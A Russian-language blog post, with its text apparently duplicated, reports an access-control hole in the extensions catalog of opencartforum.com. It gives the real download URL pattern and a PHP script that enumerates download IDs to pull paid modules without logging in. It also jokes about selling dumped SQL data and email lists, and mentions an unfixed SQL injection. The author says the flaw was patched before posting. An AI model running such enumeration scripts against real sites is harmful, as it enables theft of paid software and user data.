Тихий вечер четверга. Ничего не предвещало, как говорится.
Решил посмотреть как идут дела у opencartforum.com с его новым каталогом, где обещано api, хотел внедрить в панель. Но что-то пошло не так...


Сириусли? Просто взять и положить болт на пользователей и разработчиков надо уметь.
Такое ощущение что был поставлен свежий опенкарт вот только что и "Какалог" (я не опечатался) создаётся в прямом эфире...
Чтож вы так долго делали то и переносили сроки.
Я не буду описывать количество мелких багов и дыр нового "каталога". Тут подойдёт картинка

Невольно вспомнилось.

Ну чтож. Дотестировали, выпустили....
Опишу по моему мнению самый адский трешак.
Первое что бросилось в глаза это наличие интересной кнопочки у одного из модулей.

"Как же так?" - подумал я - "Я ведь даже не залогинен..."
Скачав архив я увидел настоящий платный модуль, да и ещё свеженькой версии. Мдээ.
Идем дальше, у остальных дополнений кнопок нет, но "каталог" позволил же нам скачать платный модуль, значит ему глубоко посрать на что мы имеем права, а на что нет. Лишь бы была ссылка.
Ссылка была вида:
&action_product_id=324 нам не интересно, а вот download_id=274621 уже другое дело.
На коленке пишем простенький скрипт:
И запускаем его где нибудь на локалке =D
И смотрим как наполняется папка архивами с модулями.
Качаются все, платные, бесплатные...
Жесть короче, этот баг не единственный, к сожалению.
Если меня читает администрация opencartforum.com - то у меня к вам предложение:
Продам вам в одни руки некий sql файл с какими-то данными или некий txt файл с какими-то почтами извлеченными из некоего sql файла, или же zip архив с кучей каких-то других архивов.
Не комплектом, с ценой за позицию. Дорого.
Это шутка. Эти артефакты навсегда останутся в недрах моего жесткого диска для напоминания мне что перед запуском чего либо нужно тестировать и они никогда не увидят свет (не пишите в личку! Ни по дружбе, ни по братски. Никак.).
Спасибо за внимание, Всем добра)
P.S. Кусочек чего-то)

P.S.S. Как честный человек я подождал пока баг будет пофикшен перед тем как постить (в общей сложности, конкретно этот баг жил очень долго, SQL иньекция жива до сих пор), поэтому способ описанный здесь, более не работает.
P.S.S.S. Я далеко не самый умный поэтому я не несу ответственности если кто-то сделал так же и выложит дампы в сеть.
Решил посмотреть как идут дела у opencartforum.com с его новым каталогом, где обещано api, хотел внедрить в панель. Но что-то пошло не так...


Сириусли? Просто взять и положить болт на пользователей и разработчиков надо уметь.
Такое ощущение что был поставлен свежий опенкарт вот только что и "Какалог" (я не опечатался) создаётся в прямом эфире...
Чтож вы так долго делали то и переносили сроки.
Я не буду описывать количество мелких багов и дыр нового "каталога". Тут подойдёт картинка

Невольно вспомнилось.

Ну чтож. Дотестировали, выпустили....
Опишу по моему мнению самый адский трешак.
Первое что бросилось в глаза это наличие интересной кнопочки у одного из модулей.

"Как же так?" - подумал я - "Я ведь даже не залогинен..."
Скачав архив я увидел настоящий платный модуль, да и ещё свеженькой версии. Мдээ.
Идем дальше, у остальных дополнений кнопок нет, но "каталог" позволил же нам скачать платный модуль, значит ему глубоко посрать на что мы имеем права, а на что нет. Лишь бы была ссылка.
Ссылка была вида:
Код:
https://extensions.myopencart.com/index.php?route=product/download/download&download_id=274621&action_product_id=324
На коленке пишем простенький скрипт:
PHP:
<?php
$i= 0;
while($i<100000000){
$url = "https://extensions.myopencart.com/index.php?route=product/download/download&download_id=".$i."&action_product_id=3363";
$file = fopen(md5($url), 'a');
if($file){
fwrite($file, file_get_contents( $url ));
fclose($file);
}
$i++;
sleep(2);
}
?>
И смотрим как наполняется папка архивами с модулями.
Качаются все, платные, бесплатные...
Жесть короче, этот баг не единственный, к сожалению.
Если меня читает администрация opencartforum.com - то у меня к вам предложение:
Продам вам в одни руки некий sql файл с какими-то данными или некий txt файл с какими-то почтами извлеченными из некоего sql файла, или же zip архив с кучей каких-то других архивов.
Не комплектом, с ценой за позицию. Дорого.

Это шутка. Эти артефакты навсегда останутся в недрах моего жесткого диска для напоминания мне что перед запуском чего либо нужно тестировать и они никогда не увидят свет (не пишите в личку! Ни по дружбе, ни по братски. Никак.).
Спасибо за внимание, Всем добра)
P.S. Кусочек чего-то)

P.S.S. Как честный человек я подождал пока баг будет пофикшен перед тем как постить (в общей сложности, конкретно этот баг жил очень долго, SQL иньекция жива до сих пор), поэтому способ описанный здесь, более не работает.
P.S.S.S. Я далеко не самый умный поэтому я не несу ответственности если кто-то сделал так же и выложит дампы в сеть.
- Автор этого поста
- Получает вознаграждение за каждую симпатию к этому посту.